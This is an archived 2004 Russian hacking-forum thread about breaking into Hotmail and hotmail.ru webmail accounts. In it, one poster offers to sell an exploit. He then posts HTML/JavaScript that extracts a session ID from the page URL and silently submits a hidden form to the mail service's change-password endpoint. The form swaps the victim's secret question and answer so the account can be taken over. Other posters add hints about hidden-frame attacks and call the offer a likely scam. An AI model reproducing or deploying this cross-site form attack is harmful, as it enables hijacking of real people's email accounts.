PDA

Просмотр полной версии : Ломается ли хотмайл?

lol
11.10.2004, 18:08
Напишите пожалста, можно ли ломануть хотмайл.ком ? Или он особенный?
susanin
13.10.2004, 03:55
*** сколько можно говорить... не сломаешь ты хотмаил, если и есть спсобы то только приватные..  http://forum.antichat.ru/iB_html/non-cgi/emoticons/mad.gif
13.10.2004, 20:03
Есть! Надо только головой подумать.... Кстати все написано на antichate http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
salop
13.10.2004, 20:33
угу и чтоже там написано? что позваляет хотмыло сломать лол
14.10.2004, 20:38
Сейчас пишу скрипт... проблема с substr. КТо шарит в js стукните мне 5895544.
За ранее... http://forum.antichat.ru/iB_html/non-cgi/emoticons/smile.gif
15.10.2004, 16:54
Все! 2-а дня мучений и эксплойт готов. Експлойт пока работает только с веб интерфейсом. То есть юзер должен проверять ящик именно через веб интерфейс.Работает все так что при открытие письма, выполняется js, который меняет нужные данные, и дает нам пароль.  Продам эксплойт за каких то 10$.... стучите в 5895544...
Щас работаю над тем чтобы скрипт пахал через любое почт. программу. (the bat, аутлук и тд)....


Вообщето я ни чего продавать не хотел, но просто очень ща деньги нужны http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif
Че Гевара
15.10.2004, 20:20
shine, ну не смеши ...
16.10.2004, 15:50
2чегевара: Всмысле?
salop
16.10.2004, 18:38
интерестно как ты смог изменить нужные данные если там везде нужно указать первоночальный пароль ? http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif
Че Гевара
16.10.2004, 18:42
Во-первых, я не считаю, что там есть xss, которое изменяет какие-либо параметры .. Это было бы слишком просто ...
Во-вторых, я так и непонял, что ты хотел сказать имея ввиду работу скрипта через почтовую программу ...
Я могу ошибаться, но по-моему это развод ...
16.10.2004, 19:23
Да это развод, только явно не вас. Есть 2-е формы секретный вопрос и секретный ответ... Есть форма настроек данных и есть поле маил. На все эти формы пароль не требуетсяhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
Под почтовый клиент, естественно js может и не пахать(например в бате), поэтому придется крепить html'ку. Это конечно пока толька идеи, но мне кажется что ид-ешник получится вытащить из хистори(так как в почтовом клиенте больше ее вы тащить не откуда). Для особо не верущих этот код:

<html>
<script&gt;
var stroka=location+'#';
var sid=stroka.substr(98,32);

&lt;/script&gt;
&lt;form &nbsp; method=&quot;POST&quot; name=&quot;forma&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;session_id&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;cp_msg&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;__post&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;cp_quest&quot; value=&quot;Ни рыба, ни мясо?и не курица тожеhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; name=&quot;cp_answ&quot; &nbsp;value=&quot;321123&quot;&gt;
&nbsp; &nbsp;&lt;INPUT type=&quot;hidden&quot; method=&quot;POST&quot; value=&quot;Внести изменения&quot;&gt;
&nbsp;&lt;/form&gt;
<script&gt;
forma.action=&quot;http://www4.nm.ru/users/chpass.dhtml?session_id=&quot;+sid;
forma.session_id.value=sid;
document.forma.submit()
&lt;/script&gt;
&lt;/html&gt;

Этот js меняет лишь секретный вопрос и ответ...
з.ы. Скрипт работает только в прикрепленном файле с именем &quot;Ready exploit for hotmail.ru.html&quot;. Сами понимаите измените имя фаила, изменится локатион. Скрипт работает только вод веб-интерфейсом

Это так сказать тестовая версияhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif За полной обращайтесь в фсбhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif)
Technocrat
17.10.2004, 17:19
странно, может багу пофиксили уже, но месяц назад просто скрытым фреймом мне удалось сменить секретный вопрос и ответ на праре ящиков...
salop
17.10.2004, 19:49
Парень лол , разговор ващето идт о hotmail.com гыгы
Technocrat
18.10.2004, 14:12
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (salop @ октября 17 2004,19:49)</td></tr><tr><td id="QUOTE">Парень лол , разговор ващето идт о hotmail.com гыгы[/QUOTE]<span id='postcolor'>
мдя... если про .com речь, то имхо оч. сложно... SSL какникак... да и фиксят поди всё вовремя
18.10.2004, 22:48
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (salop @ октября 17 2004,19:49)</td></tr><tr><td id="QUOTE">Парень лол , разговор ващето идт о hotmail.com гыгы[/QUOTE]<span id='postcolor'>
Бля не заметилhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif (Во что пиво с людьми делаетhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif) НУ и пох.... короче если кому експлойт под хотмеил.РУ нужон, стучитеhttp://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif http://forum.antichat.ru/iB_html/non-cgi/emoticons/turn.gif
De1eT
19.10.2004, 00:21
Тут значит разводят флейм )))Круто ))я попал на пастбище